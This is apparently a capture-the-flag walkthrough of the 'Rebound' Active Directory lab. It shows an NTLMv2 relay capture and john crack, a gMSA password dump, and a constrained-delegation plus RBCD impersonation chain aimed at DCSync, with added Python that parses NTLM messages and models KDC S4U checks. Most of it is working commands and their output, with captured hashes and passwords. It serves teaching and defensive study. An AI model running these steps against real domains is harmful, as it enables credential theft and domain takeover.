[*] Init com server
[*] GetModuleFileName: c:\users\winrm_svc\documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADb8QujUWpk7EXlFOjCHVuIAigAAGwb//87FS6QsIPIYCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b208e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c289e25976b5afd38af057000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da010000000000000000000000005c00410070007000490044005c004b00507044400b7f0000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:5976b5afd38af057:781d933ebf471ba3a53f8fde38534ba5:0101000000000000b4a468ea5e87da01403a32a0d7d14b060000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da0106000400060000000800300030000000000000000100000000200000324a7a4dc5cc35f66c25982fee19d22fd89b784aed0a551a1d262bb80a1919680a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
at KrbRelay.Program.Main(String[] args)

Although the run ends with an access-denied error, tbrady's NTLMv2 response (the NTLM3 line, already in john's netntlmv2 format) was captured. Save it to a file and feed it to john.

john tbrady --wordlist=/usr/share/wordlists/rockyou.txt

543BOMBOMBUNmanda (tbrady)
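The NTLM exchange KrbRelay printed is worth parsing rather than just pasting into john, both to read the target information the DC advertised and to confirm the capture is internally consistent: the server challenge and the timestamp in the CHALLENGE_MESSAGE must be the ones bound into the NTLMv2 response. The parser below is an added example, not part of the writeup or of KrbRelay. Its two input constants are the NTLM2 hex and the NTLM3 john line copied from the output above; the field names follow MS-NLMP. KrbRelay dumps its whole buffer, so the NTLM2 line carries bytes beyond the declared TargetInfo; an offset-based parser never reads them.

```python
"""Parse the NTLM messages KrbRelay printed during the cross-session relay.

Added example; not code from the writeup or from KrbRelay. CHALLENGE_HEX is
the NTLM2 line and JOHN_LINE the NTLM3 line from the output above. Layouts
follow MS-NLMP 2.2.1.2 (CHALLENGE_MESSAGE), 2.2.2.1 (AV_PAIR) and 2.2.2.7
(NTLMv2_CLIENT_CHALLENGE).
"""
import struct
from datetime import datetime, timedelta, timezone

CHALLENGE_HEX = "4e544c4d53535000020000000e000e003800000015c289e25976b5afd38af057000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da010000000000000000000000005c00410070007000490044005c004b00507044400b7f0000"
JOHN_LINE = "tbrady::rebound:5976b5afd38af057:781d933ebf471ba3a53f8fde38534ba5:0101000000000000b4a468ea5e87da01403a32a0d7d14b060000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da0106000400060000000800300030000000000000000100000000200000324a7a4dc5cc35f66c25982fee19d22fd89b784aed0a551a1d262bb80a1919680a00100000000000000000000000000000000000090000000000000000000000"

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
NEGOTIATE_SIGN, NEGOTIATE_ALWAYS_SIGN = 0x00000010, 0x00008000


def _from_hex(text: str) -> bytes:
    text = text.strip()
    return bytes.fromhex(text[:len(text) // 2 * 2])  # tolerate a dangling nibble in a raw dump


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(data: bytes, pos: int) -> dict:
    """Walk the MsvAvPair list at data[pos:] until MsvAvEOL."""
    av = {}
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        value = data[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:
            break
        if av_id == 7:
            av["Timestamp"] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            av["Flags"] = struct.unpack("<I", value)[0]
        elif av_id in (1, 2, 3, 4, 5, 9):
            av[AV_NAMES[av_id]] = value.decode("utf-16-le")
        else:
            av[AV_NAMES.get(av_id, f"Av{av_id}")] = value.hex()
    return av


def parse_challenge(hex_msg: str) -> dict:
    data = _from_hex(hex_msg)
    if data[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", data, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", data, 12)
    flags = struct.unpack_from("<I", data, 20)[0]
    _ti_len, _, ti_off = struct.unpack_from("<HHI", data, 40)
    return {
        "target_name": data[tn_off:tn_off + tn_len].decode("utf-16-le"),
        "flags": flags,
        "signing_offered": bool(flags & (NEGOTIATE_SIGN | NEGOTIATE_ALWAYS_SIGN)),
        "server_challenge": data[24:32].hex(),
        "av_pairs": parse_av_pairs(data, ti_off),
    }


def parse_ntlmv2_john(line: str) -> dict:
    """Split user::domain:server_challenge:NTProofStr:blob and decode the blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = _from_hex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": parse_av_pairs(blob, 28),
    }


def response_matches_challenge(challenge: dict, response: dict) -> bool:
    """A genuine NTLMv2 response binds the challenge's nonce and its timestamp."""
    return (response["server_challenge"] == challenge["server_challenge"]
            and response["timestamp"] == challenge["av_pairs"]["Timestamp"])


if __name__ == "__main__":
    ch = parse_challenge(CHALLENGE_HEX)
    resp = parse_ntlmv2_john(JOHN_LINE)
    print("server challenge:", ch["server_challenge"], "from", ch["av_pairs"]["DnsComputerName"])
    print("challenge time  :", ch["av_pairs"]["Timestamp"])
    print("response from   :", f'{resp["domain"]}\\{resp["user"]}', "consistent:", response_matches_challenge(ch, resp))
```

The same parser can be pointed at any relay or Responder capture; if the timestamp in the blob does not match the AV_PAIR timestamp of the challenge, the two halves were not from the same exchange and the john line will not crack.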

Enumerating tbrady's rights shows that he has ReadGMSAPassword on delegator$.

A Group Managed Service Account (gMSA) is an account whose password Windows Server manages itself, generating and rotating a long random value. Principals granted read access can fetch it from the account's msDS-ManagedPassword attribute; use bloodyAD to dump it for delegator$.

[root@kali:~/bloodyAD on main]
# python bloodyAD.py -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:43e9069a73081ecfcbe1514e1d4e3bc8
msDS-ManagedPassword.B64ENCODED: tstzpYhnwwC1LuLjL0MtLrXzhLdDe8HPWCmR5BxwR5Gg87pPdmKYlhqMUh7njfqjzauLXDCp0Ofk7V+yfqCu0f5t+5zS/SmOw5wdqERpgl/uyd6LdKk/ZJYHAhifOVFWl4svHJ787reCRKbS+44rzi1DM4CcY/LLKAzHevGe3NkHww8vILZUU6cQNcKSyteGPRmxK2iq05EUs8ggGBwxAHwXCm24U8gdc19ILeL8YTtbUy/n5t+t7/DScrDHK8O1Suo6yPJXP37UaDsbIWJiqGNgcSLyWPgT6hEhLkODEjsBiqAgDAYTkrR6YZ1jlQGr6bSd9o70rSN6lPoRlfkDyQ==
[root@kali:~/bloodyAD on main]
# netexec ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP rebound.htb 636 DC01 [+] rebound.htb\tbrady:543BOMBOMBUNmanda
LDAP rebound.htb 636 DC01 [*] Getting GMSA Passwords
LDAP rebound.htb 636 DC01 Account: delegator$ NTLM: 43e9069a73081ecfcbe1514e1d4e3bc8

delegator$’s hash: 43e9069a73081ecfcbe1514e1d4e3bc8

Constrained Delegation (KCD) Abuse

Attackers can abuse Kerberos delegation to gain access to important resources and, in some cases, escalate all the way to Domain Admin. Two specific forms of delegation, constrained delegation and resource-based constrained delegation (RBCD), rely on the Kerberos extension called Service-for-User (S4U).

Although BloodHound did not show constrained delegation, findDelegation.py shows that delegator$ is in fact allowed to delegate:

findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo
----------- ----------------------------------- ----------------------------------- ---------------------
DC01$ Computer Unconstrained N/A
delegator$ ms-DS-Group-Managed-Service-Account Constrained w/o Protocol Transition http/dc01.rebound.htb
  • Note: again, the ThePorgs fork of Impacket installed earlier is used.

Delegation without protocol transition means it cannot be abused with the classic getST approach. Trying to do so results in a Kerberos error:

getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -dc-ip dc01.rebound.htb -spn http/dc01.rebound.htb -impersonate Administrator
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable

This is caused by the lack of protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION is not set on delegator$): the S4U2Self step does not produce a forwardable ticket, so the S4U2Proxy step, which requires one as evidence, fails.

In essence, the Service-for-User-to-Self (S4U2Self) protocol lets a service obtain a service ticket to itself on behalf of another user. The Service-for-User-to-Proxy (S4U2Proxy) protocol lets a service present that ticket and request a ticket on behalf of the same user, but to a different service.

This can be verified by performing S4U2Self alone and inspecting the resulting ticket. First request the ticket with the -self flag:

getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -dc-ip dc01.rebound.htb -spn http/dc01.rebound.htb -impersonate Administrator -self
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in Administrator@delegator$@REBOUND.HTB.ccache

Inspecting the ticket shows that the forwardable flag is not set (only renewable, pre_authent and enc_pa_rep appear in the flags):

describeTicket.py Administrator@delegator\$@REBOUND.HTB.ccache
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 997cb2bd199848c134a230582eed4046
[*] User Name : Administrator
[*] User Realm : rebound.htb
[*] Service Name : delegator$
[*] Service Realm : REBOUND.HTB
[*] Start Time : 05/04/2024 09:28:48 AM
[*] End Time : 05/04/2024 19:28:48 PM
[*] RenewTill : 06/04/2024 09:28:46 AM
[*] Flags : (0xa10000) renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : mXyyvRmYSME0ojBYLu1ARg==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*delegator$*$d18681bc307159d28a5dee77$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
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : delegator$
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

At this stage, the constrained delegation can still be abused in two ways:

  1. Perform a resource-based constrained delegation (RBCD) attack, so that a forwardable ticket for the impersonated user can be obtained from another account and then handed to delegator$'s S4U2Proxy.
  2. Coerce or wait for a user to authenticate to the service while running a Kerberos listener, capturing a forwardable ticket that way.

Right now the former seems the more feasible option.

Resource-Based Constrained Delegation RBCD

To perform the RBCD attack, another service or user must be written into delegator$'s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which allows that principal to delegate to delegator$. The write is possible because the gMSA's own credentials are known.

The account is chosen under the constraint that it must have at least one SPN, which leads to ldap_monitor. For rbcd.py to work, /etc/hosts must be modified to put dc01 before the other hostnames, like so:

10.10.11.231 dc01 dc01.rebound.htb rebound.htb

If this change is omitted, rbcd.py returns an "[-] Invalid server address" error.

rbcd.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -k -delegate-from ldap_monitor -delegate-to delegator$ -action write -dc-ip dc01 -use-ldaps
[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)

The modified attribute can be verified in powerview:

powerview rebound.htb/oorend:'1GR8t@$$4u'@dc01.rebound.htb -k
Get-DomainObject -Identity delegator$
objectClass : top
person
organizationalPerson
user
computer
msDS-GroupManagedServiceAccount
cn : delegator
distinguishedName : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
instanceType : 4
whenCreated : 20230408090831.0Z
whenChanged : 20240405143632.0Z
uSNCreated : 69353
uSNChanged : 428294
name : delegator
objectGUID : {c9da97ae-5e35-44d2-aa15-114aecdc0caf}
userAccountControl : WORKSTATION_TRUST_ACCOUNT [4096]
badPwdCount : 0
codePage : 0
countryCode : 0
badPasswordTime : 04/04/2024
lastLogoff : 0
lastLogon : 04/05/2024
localPolicyFlags : 0
pwdLastSet : 04/02/2024
primaryGroupID : 515
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7687
accountExpires : 9223372036854775807
logonCount : 107
sAMAccountName : delegator$
sAMAccountType : 805306369
dNSHostName : gmsa.rebound.htb
servicePrincipalName : browser/dc01.rebound.htb
objectCategory : CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=rebound,DC=htb
isCriticalSystemObject : FALSE
dSCorePropagationData : 16010101000000.0Z
lastLogonTimestamp : 133562535487307243
msDS-AllowedToDelegateTo : http/dc01.rebound.htb
msDS-SupportedEncryptionTypes : RC4-HMAC
AES128
AES256
msDS-AllowedToActOnBehalfOfOtherIdentity : AQAEgEAAAAAAAAAAAAAAABQAAAAEACwAAQAAAAAAJAD/AQ8AAQUAAAAAAAUVAAAAnSwX8yHn8FjpghKZAR4AAAECAAAAAAAFIAAAACACAAA=
msDS-ManagedPasswordId : AQAAAEtEU0sCAAAAagEAAAoAAAAGAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordPreviousId : AQAAAEtEU0sCAAAAagEAAAcAAAAeAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval : 30
msDS-GroupMSAMembership : AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAABSAAAAAgAgAABAAsAAEAAAAAACQA/wEPAAEFAAAAAAAFFQAAAJ0sF/Mh5/BY6YISmQYeAAA=

Running findDelegation.py again also shows the updated entry:

findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo
------------ ----------------------------------- ----------------------------------- ---------------------
DC01$ Computer Unconstrained N/A
ldap_monitor Person Resource-Based Constrained delegator$
delegator$ ms-DS-Group-Managed-Service-Account Constrained w/o Protocol Transition http/dc01.rebound.htb

Everything needed for RBCD is now in place. The idea: ldap_monitor can request a ticket to delegator$'s SPN on behalf of any account (S4U2Self followed by S4U2Proxy, authorised by the RBCD entry just written), which yields a forwardable ST for the impersonated account on delegator$. The account to impersonate is DC01$, because Administrator is flagged NOT_DELEGATED (sensitive, cannot be delegated):

Get-DomainUser -Identity Administrator
cn : Administrator
description : Built-in account for administering the computer/domain
distinguishedName : CN=Administrator,CN=Users,DC=rebound,DC=htb
memberOf : CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb
CN=Domain Admins,CN=Users,DC=rebound,DC=htb
CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
CN=Schema Admins,CN=Users,DC=rebound,DC=htb
CN=Administrators,CN=Builtin,DC=rebound,DC=htb
name : Administrator
objectGUID : {37857665-6e2e-4f12-9976-5c9babcd8282}
userAccountControl : NORMAL_ACCOUNT [1114624]
DONT_EXPIRE_PASSWORD
NOT_DELEGATED
badPwdCount : 1
badPasswordTime : 04/05/2024
lastLogoff : 0
lastLogon : 03/29/2024
pwdLastSet : 04/08/2023
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
adminCount : 1
sAMAccountName : Administrator
sAMAccountType : 805306368
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

delegator$ can then use its constrained-delegation right (msDS-AllowedToDelegateTo = http/dc01.rebound.htb) to pass that forwardable ST to S4U2Proxy, producing an ST for DC01$ to the DC's HTTP service. delegator$ could not do this on its own: it is configured without protocol transition, so its own S4U2Self tickets are not forwardable and would be rejected by S4U2Proxy, which is why the RBCD hop through ldap_monitor is needed.

First, as ldap_monitor, request an ST for browser/dc01.rebound.htb (delegator$'s SPN) impersonating DC01$:

getST.py rebound.htb/ldap_monitor:'1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

Because this ticket is forwardable (see the Flags line in the describeTicket.py output), it can be handed to the next S4U2Proxy request directly, skipping the S4U2Self step:

describeTicket.py DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 767d153d636e861400de859c0d561ba9
[*] User Name : DC01$
[*] User Realm : rebound.htb
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Start Time : 05/04/2024 09:45:34 AM
[*] End Time : 05/04/2024 19:45:33 PM
[*] RenewTill : 06/04/2024 09:43:52 AM
[*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : dn0VPWNuhhQA3oWcDVYbqQ==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$8a9675ea512659235df48421$7458895533348641c64dc62d133e5e03b4884970efdc309d94bd69c6048ee1e41fc7223cbaa570d0dbaa677985115f8b10153b4e08f299f5e5625fbb8d280a8226ab6ec8aeec14a9cde49902c9441dfee71e0fc38bd342d8af61593edd951f1d9d05499e5c01bd3fbeab18cbdc7876a6a189fa7c853d944d6057312d52a53bbe294b2191211a247c198abd00bb95152f74b8b1488c343a381d28ced950705b379ada4cf2d433e87ecfc34dbc29026cc05042e81933a1221781064d17ffae974ac83038236a17cee8151eab2e11014a90deca09b7e05632d564728c489add0fc6f68b8bd0ab425e1f3a891d38f47e3bf61d07dc1a1e7211080b0ad1211eb5543455235dd9f01da926c249480fb8b195346cedba939a5ba9239f9f8c6d270524d6e5b1aad7aa8fb8488c75964ffc964098b60c212658725e85bea570c88396551e23e0af1f19f7042bfa38db3fb4f3ee87efca16931f7cdf05a5179d264b1d63addd312325d1012e2106d305aeecdc8e645eaa089890b37b0f44d615a547b0049bc2f4618e63ea9653437c5c18f16c115f106ef259d1800429d1302ccfef6c2392636a571789f83fd56596b776efbd784d0153beb770ae6eee1771fbb561c079803c5a56a0026946ecc88c730647df64968d65f6b91f6a096657e439e73c7145df53fc7e7ab8ead89ebdcf52952cd42f5e6a5496aaf3a1c3142ad719687769ec44de969223c94fe0990e9fe3f73e71fbd99cfff2f0a6c609a0a08c325ddbef586a1d4c88f5f648dcfe4390565f4ada6a13805152b247837cd2cac7adc98b1b4bd755829566896aea34e12f35ae6bd4f9ed29bc7849d998168e7a7ce3f67f6ba0ed6faf6a85c80e180234ef34d106ea7cdcdd45749849ada99ddc2e0e9584473cf69c785016d59df543965feaefaf254a621faa1a5dd4e8a397c1a70baae027c6e5d69bf934dd873566dbe6857b96450cae2a8e3ccdafa7d6550f3ebad667a3d1f4bd5a95729a817907d3246c34da60ff1ee54d31592e9e2c006feb485db8cde5ada3ef04dba13522409acbc835b2d66017f6366e27dfa487b1d15c634ef03446c7f0baf1b4e106161242c45704f026a1ed95207c6bdce5842d8ab9ab7606841a6c632140d4e543bf8d8a696d0960db0799ff19e4148294ef6d47be90c18d5c66fa69e69ea48390b73e2981d8d9146f5788c4d2bfe9ffb5498b75dcef923202fc8da417003280a27797ea0e5d6592cc0419f500df5cf6188d20be4b7d909ec3d137366da5ccc0d1a58b8a1a73bcdfc64d602ffa91d72c0438364ca56b195f8f5beed6f6f1720184ce553341b12cde0291eb24c6e8c5d
96d186bbedcdff254673c3b4de709f3f6d3c27aabbb45c5779d223eb81e5b97fd7da406226d7012d5b1e350fe9f73b133dde5777efb7781b1b7759ccc8b8b3af0574d16ffd1a0ea0121973b3fd0129b07a0b4034163212242f5b429e9b562c4f9d6f69c91e1990701625d7afbc7624b70bc54d92040a9a02e0d5aab61abd85462a74624d35a25f1774df006705c7ffae4f8158f5c8a70e19b81f8b93ca2b9d0d50d193f462a80d1cc2cb6dd6f2efc96667ac1ce796e13ff721d7dd812efc9ec993fa99b2af0b7321fa4bc35ddc072caf2d2bf5aff6b9d2249490a2c97fbae72f66d4948f1aab10a15fc161a92e0a873136a1c581083c0b18c7cdbe8c13a2708e9f8f5e4f5bc389b9b808f98dcb25fdb80ca593049b6497819610cce55a755d568ab52253e563b7aa8e42dc4b5f659937188989582191a97652beff2eac4bf0bf5d064f1d29c2b662751ede388
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

Completing the attack

getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -spn http/dc01.rebound.htb -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -impersonate DC01$
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

Supplying the forwardable ticket with the -additional-ticket flag feeds it straight into S4U2Proxy as the evidence ticket, which yields an ST for DC01$ to http/dc01.rebound.htb on the domain controller.
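
To make explicit why the two-hop order above is the only one that works, here is an added example (not impacket, not Windows KDC code): a toy model of the MS-SFU 3.2.5.2 checks that decide each S4U request, reduced to the four inputs the chain depends on: the forwardable flag on S4U2Self tickets, NOT_DELEGATED on the impersonated account, classic constrained delegation (msDS-AllowedToDelegateTo) and RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity). The accounts are modelled with the attributes shown on this page; giving DC01$ an explicit http/ SPN is a simplification (on the real DC it is covered by HOST/dc01.rebound.htb). It also decodes the Flags value describeTicket.py printed, 0x40a10000, back to the flag names.

```python
"""Toy KDC model of the S4U2Self / S4U2Proxy decisions behind the Rebound chain (added example)."""
from dataclasses import dataclass, field


@dataclass
class Account:
    name: str
    spns: set = field(default_factory=set)
    not_delegated: bool = False        # userAccountControl NOT_DELEGATED ("sensitive, cannot be delegated")
    trusted_to_auth: bool = False      # TRUSTED_TO_AUTH_FOR_DELEGATION, i.e. protocol transition
    allowed_to_delegate_to: set = field(default_factory=set)    # msDS-AllowedToDelegateTo (SPNs)
    allowed_to_act_on_behalf: set = field(default_factory=set)  # RBCD, requester account names


@dataclass
class ServiceTicket:
    client: str        # impersonated principal
    service: str       # account name (S4U2Self) or SPN (S4U2Proxy) the ticket is for
    forwardable: bool


class KdcError(Exception):
    pass


class Kdc:
    def __init__(self, accounts):
        self.accounts = {a.name: a for a in accounts}
        self.by_spn = {spn: a for a in accounts for spn in a.spns}

    def _owner(self, name_or_spn):
        return self.by_spn.get(name_or_spn) or self.accounts.get(name_or_spn)

    def s4u2self(self, requester, impersonate):
        """Ticket to the requester itself as `impersonate`: always issued, forwardable only
        when the requester may do protocol transition and the user is delegatable."""
        svc, user = self.accounts[requester], self.accounts[impersonate]
        return ServiceTicket(impersonate, requester, svc.trusted_to_auth and not user.not_delegated)

    def s4u2proxy(self, requester, evidence, target_spn):
        """Exchange an evidence ticket (addressed to the requester) for a ticket to target_spn."""
        if self._owner(evidence.service) is not self.accounts[requester]:
            raise KdcError("KDC_ERR_BADOPTION: evidence ticket is not for " + requester)
        target = self._owner(target_spn)
        if target is None:
            raise KdcError("KDC_ERR_S_PRINCIPAL_UNKNOWN: " + target_spn)
        if self.accounts[evidence.client].not_delegated:
            raise KdcError("KDC_ERR_BADOPTION: %s is NOT_DELEGATED" % evidence.client)
        # Classic constrained delegation accepts only a forwardable evidence ticket.
        if evidence.forwardable and target_spn in self.accounts[requester].allowed_to_delegate_to:
            return ServiceTicket(evidence.client, target_spn, True)
        # RBCD: the target's own attribute lists the requester; forwardability of the evidence is not required.
        if requester in target.allowed_to_act_on_behalf:
            return ServiceTicket(evidence.client, target_spn, True)
        raise KdcError("KDC_ERR_BADOPTION: %s may not delegate to %s" % (requester, target_spn))


def rebound_domain():
    """The accounts as this page shows them after the RBCD write on delegator$."""
    return Kdc([
        Account("DC01$", spns={"http/dc01.rebound.htb"}),       # simplification, see lead-in
        Account("Administrator", not_delegated=True),
        Account("ldap_monitor"),
        Account("delegator$", spns={"browser/dc01.rebound.htb"},
                allowed_to_delegate_to={"http/dc01.rebound.htb"},
                allowed_to_act_on_behalf={"ldap_monitor"}),
    ])


def attempt(kdc, hops):
    """Run (requester, impersonate, target_spn) hops like successive getST.py calls.
    From the second hop on the previous ticket is the evidence (-additional-ticket),
    so S4U2Self is skipped. Returns (ticket, None) or (None, error text)."""
    ticket = None
    try:
        for requester, impersonate, target_spn in hops:
            evidence = ticket if ticket else kdc.s4u2self(requester, impersonate)
            ticket = kdc.s4u2proxy(requester, evidence, target_spn)
        return ticket, None
    except KdcError as e:
        return None, str(e)


DIRECT = [("delegator$", "DC01$", "http/dc01.rebound.htb")]            # delegator$ alone
CHAIN = [("ldap_monitor", "DC01$", "browser/dc01.rebound.htb"),         # hop 1: RBCD
         ("delegator$", "DC01$", "http/dc01.rebound.htb")]              # hop 2: constrained delegation
CHAIN_AS_ADMIN = [(r, "Administrator", t) for r, _u, t in CHAIN]


def decode_ticket_flags(flags):
    """Names of the bits set in a describeTicket.py Flags value (RFC 4120 TicketFlags, bit 0 = MSB)."""
    names = ["reserved", "forwardable", "forwarded", "proxiable", "proxy", "may_postdate",
             "postdated", "invalid", "renewable", "initial", "pre_authent", "hw_authent",
             "transited_policy_checked", "ok_as_delegate", "anonymous", "enc_pa_rep"]
    return [n for i, n in enumerate(names) if flags & (1 << (31 - i))]


if __name__ == "__main__":
    kdc = rebound_domain()
    for label, hops in (("direct", DIRECT), ("chain", CHAIN), ("chain as Administrator", CHAIN_AS_ADMIN)):
        print(label, attempt(kdc, hops))
    print(decode_ticket_flags(0x40a10000))
```

Running it shows the three outcomes the page relies on: the direct attempt by delegator$ is refused because its S4U2Self ticket is not forwardable and DC01$ has no RBCD entry for it; the chain succeeds with a forwardable ST for DC01$ to http/dc01.rebound.htb; and the same chain targeting Administrator stops at the first S4U2Proxy because of NOT_DELEGATED.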

Finally, hand that ticket to secretsdump.py. DC01$ is a domain controller account and may replicate directory changes, so DCSync over DRSUAPI works and returns the Administrator hash:

